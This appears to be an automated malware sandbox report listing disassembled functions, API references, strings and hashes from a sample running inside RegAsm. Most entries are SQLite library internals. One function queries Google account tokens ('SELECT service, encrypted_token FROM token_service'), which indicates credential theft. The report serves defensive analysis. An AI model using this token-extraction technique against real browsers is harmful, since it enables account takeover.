Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction ID: 2af6b72bf9dd8c3aa867851366660c5d98c3d1301968158d5dc5bbfebd6a1f73
Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction Fuzzy Hash: 9851F0F5A05342ABDB00DE14EC81BEFB3E8EFA4314F40053DF98497201E725AA5987A7

Function 1B701940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B701B17
%s at line %d of [%.10s], xrefs: 1B701B26
misuse, xrefs: 1B701B21
block, xrefs: 1B701A90

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-4016964285
Opcode ID: d85867fbd4bd0cbac3ef780014f4b0ff4baa2a6a7d5a0c84ea1e74d627bd22b8
Instruction ID: 027347cec0958b363ef164ed58e55b1ee8b35b141fa158fcb15cbbc29023d43e
Opcode Fuzzy Hash: d85867fbd4bd0cbac3ef780014f4b0ff4baa2a6a7d5a0c84ea1e74d627bd22b8
Instruction Fuzzy Hash: 8FC1D0B0D042519FCB10CF2AE884ADA77E4FF46B14F05456AFC899B641EB31E954CBA2

Function 00408A07 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 308stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00408A0C

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

lstrlenA.KERNEL32(00000000), ref: 00408C2E

Part of subcall function 00411B55: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E

StrStrA.SHLWAPI(00000000,AccountId), ref: 00408C53
lstrlenA.KERNEL32(00000000), ref: 00408D3D
lstrlenA.KERNEL32(00000000), ref: 00408D51

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 00408BAA
GoogleAccounts, xrefs: 00408AC0
GoogleAccounts, xrefs: 00408A3D
AccountId, xrefs: 00408C4D

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 832884763-1713091031
Opcode ID: 2b258b7a0fbf6bf663b61f0a99ee6075fec3e006b3052d8592247c947f4d19b0
Instruction ID: a5afe084f524f6eacdb512f1c52d9d102d198ca90d5d338392595a3e0c8d1b09
Opcode Fuzzy Hash: 2b258b7a0fbf6bf663b61f0a99ee6075fec3e006b3052d8592247c947f4d19b0
Instruction Fuzzy Hash: 98C17131804148EEDB09EBE4D959BDDBBB4AF19308F10415EF416731C2EFB82B88CA65

Function 1B6AFED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

abort due to ROLLBACK, xrefs: 1B6B0068
%llu, xrefs: 1B6AFFF7
unknown error, xrefs: 1B6B003E
no more rows available, xrefs: 1B6B006F
another row available, xrefs: 1B6B0076, 1B6B0081
%llu, xrefs: 1B6AFF3C

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 0-1539118790
Opcode ID: 20c839746cbd86afea032824759d35412f3f53a1e705489717617129a1abbbe5
Instruction ID: de56fa975c6789b7f53a0e34bde5d97f1899dc109b784f5dcbc1d46df2460451
Opcode Fuzzy Hash: 20c839746cbd86afea032824759d35412f3f53a1e705489717617129a1abbbe5
Instruction Fuzzy Hash: 4E91E2B1A443019BCB08DF28CD94BDABBF1AB99714F04452DF8899B391D736E846CB52

Function 1B7B70B0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7B720D
%s at line %d of [%.10s], xrefs: 1B7B721C
misuse, xrefs: 1B7B7217
invalid rootpage, xrefs: 1B7B715C, 1B7B730E
API called with finalized prepared statement, xrefs: 1B7B7201
orphan index, xrefs: 1B7B72C2

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
API String ID: 0-165706444
Opcode ID: 2f47ab130fe38cef75be53872fc1cf69930b914ea866b7d6b4573e76d7ba899d
Instruction ID: e22be11dac74e3d4692da294c56fe0b7ba0b2b248ef945e90e925fa21d810bcd
Opcode Fuzzy Hash: 2f47ab130fe38cef75be53872fc1cf69930b914ea866b7d6b4573e76d7ba899d
Instruction Fuzzy Hash: 3E6168B5A013856BDF119F20EE81BDFB7A9EF91216F084469FC8586242E321F144CBB2

Function 1B6A3A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON

Download Yara Rule

Strings

cannot delete, xrefs: 1B6A3A82
read-only, xrefs: 1B6A3A71
cannot insert, xrefs: 1B6A3BF1, 1B6A3C52
bad page number, xrefs: 1B6A3BE3
bad page value, xrefs: 1B6A3BDC
no such schema, xrefs: 1B6A3BEA

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
API String ID: 0-1499782803
Opcode ID: 1f61132c85c5d1a0c89cb6456d08862d4f3b5ce0cd0e11794136a462ac643dd1
Instruction ID: 189b3119e908f7900514df28bbaf88efbebbfabcaec5dbe8a78a74ed8221eb16
Opcode Fuzzy Hash: 1f61132c85c5d1a0c89cb6456d08862d4f3b5ce0cd0e11794136a462ac643dd1
Instruction Fuzzy Hash: 255104F5A003118BDF048F38DCC6BD777A5AF60654F184469F8498B291E776EC49CB62

Function 1B6B9100 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 161COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6B913E
API called with NULL prepared statement, xrefs: 1B6B910D
%s at line %d of [%.10s], xrefs: 1B6B914D
misuse, xrefs: 1B6B9148
API called with finalized prepared statement, xrefs: 1B6B9122

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: ded4d73806e874c186c8c868479ab166598cd5be82afa37c0bb42a8ddf2db425
Instruction ID: f15c4acd42305ecb4b4b16a4f3898232b91c4c2d22034cfb911809aa487b0629
Opcode Fuzzy Hash: ded4d73806e874c186c8c868479ab166598cd5be82afa37c0bb42a8ddf2db425
Instruction Fuzzy Hash: C94145F1F547425BDB118F349D4ABDB36F9AFA5714F15043CE8868B382E632E44683A1

Function 1B7BB0E0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

NULL, xrefs: 1B7BB0F4
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7BB108
invalid, xrefs: 1B7BB13E
%s at line %d of [%.10s], xrefs: 1B7BB117
misuse, xrefs: 1B7BB112
API call with %s database connection pointer, xrefs: 1B7BB0F9
unopened, xrefs: 1B7BB145

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-538076154
Opcode ID: e2c2745ebdda25283b576f4c22000d0028fcbfac1cf3d6bcb8709ce6974c88b5
Instruction ID: 2920338e8836a9e44a01ce394abdebf4d9b7be19a1186b6faf818dbd0473aad5
Opcode Fuzzy Hash: e2c2745ebdda25283b576f4c22000d0028fcbfac1cf3d6bcb8709ce6974c88b5
Instruction Fuzzy Hash: E43166B5904349ABDB301B649D40BFF77A5EF85329F400529FCA5E6301E771E6068BA2

Function 0040EE86 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 100stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040EE8B
lstrlenA.KERNEL32(?,6CA87FA0,750A5460,00000000), ref: 0040EEAF
strchr.MSVCRT ref: 0040EEC1
strchr.MSVCRT ref: 0040EEE5
lstrlenA.KERNEL32(?), ref: 0040EF03
GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040EF10
HeapAlloc.KERNEL32(00000000), ref: 0040EF17
strcpy_s.MSVCRT ref: 0040EF52

Strings

0123456789ABCDEF, xrefs: 0040EE99

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 1978830238-2554083253
Opcode ID: e65f6062c3206fcaaefa6c28d1617c679be8f575f83b4505bffea8a7c61f834b
Instruction ID: 62f6fa5d23d5df559ffb852546e8d7a033c39192c83587afc1619b3f70cd98df
Opcode Fuzzy Hash: e65f6062c3206fcaaefa6c28d1617c679be8f575f83b4505bffea8a7c61f834b
Instruction Fuzzy Hash: 0231C072600115AFDB04EFAADC85AEFBBA9EF45354B00443AF511EB1D1DB38D901CBA4

Function 1B6DF4B0 Relevance: 15.1, APIs: 10, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction ID: a709f1a99fafa144138bb254780b52a7bba652b58200b3eb0a531c5fdff1bab7
Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction Fuzzy Hash: 192183FAD0235276EB02AE215C02FFF729C5F75216F0588A8FD95A2140F734E65982A7

Function 1B79FB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B79FB96
API called with NULL prepared statement, xrefs: 1B79FB65
%s at line %d of [%.10s], xrefs: 1B79FBA5
misuse, xrefs: 1B79FBA0
API called with finalized prepared statement, xrefs: 1B79FB7A

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: e3eb1be39b5265feb14d228d5057c3f1b6a48e7edf64e8fcf46d5f0f1161d024
Instruction ID: 784bf378e69fe191e88db53eed27295488f7c5ad8693490dec76575fbf92242f
Opcode Fuzzy Hash: e3eb1be39b5265feb14d228d5057c3f1b6a48e7edf64e8fcf46d5f0f1161d024
Instruction Fuzzy Hash: E7B1C0B4A047419FD710AF34F849B9B77E4BB45B28F04492CF89A8B281E775F449C7A2

Function 1B711710 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON

Download Yara Rule

Strings

rank, xrefs: 1B711824
CREATE TABLE x(, xrefs: 1B7117D9
%z%s%Q, xrefs: 1B71180D
%z, %Q HIDDEN, %s HIDDEN), xrefs: 1B711831

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
API String ID: 0-3324442540
Opcode ID: 5500cb9362451da9812ba2c04c6923035a1c92dc7256de880911cf746b7b22e7
Instruction ID: cc25ad238edc3c67e6ac7e92214141327b3febe68b4e8db27d80ed457ddd3882
Opcode Fuzzy Hash: 5500cb9362451da9812ba2c04c6923035a1c92dc7256de880911cf746b7b22e7
Instruction Fuzzy Hash: C781E2B1940312AFDB008F25EC84BDEB7E4FF44665F04062AFC88AB210D735E954CBA2

Function 1B7874A0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175COMMON

Download Yara Rule

Strings

unable to close due to unfinalized statements or unfinished backups, xrefs: 1B7875D1
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7874CD
invalid, xrefs: 1B7874BC
%s at line %d of [%.10s], xrefs: 1B7874DC
misuse, xrefs: 1B7874D7
API call with %s database connection pointer, xrefs: 1B7874C1

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 0-3800776574
Opcode ID: 240fe35d1fe477bdd85ed141216e0b4c34b23c803624230f5ef966d60250f41e
Instruction ID: c29bed29cfa7f2b9f63c03a25754d27c610d9c24e3442525eb8313d6a4396188
Opcode Fuzzy Hash: 240fe35d1fe477bdd85ed141216e0b4c34b23c803624230f5ef966d60250f41e
Instruction Fuzzy Hash: 755145B5A40702ABD7118F38EC49BDFB3A4AF40A14F054018F8AF97241E730F5A5C2A6

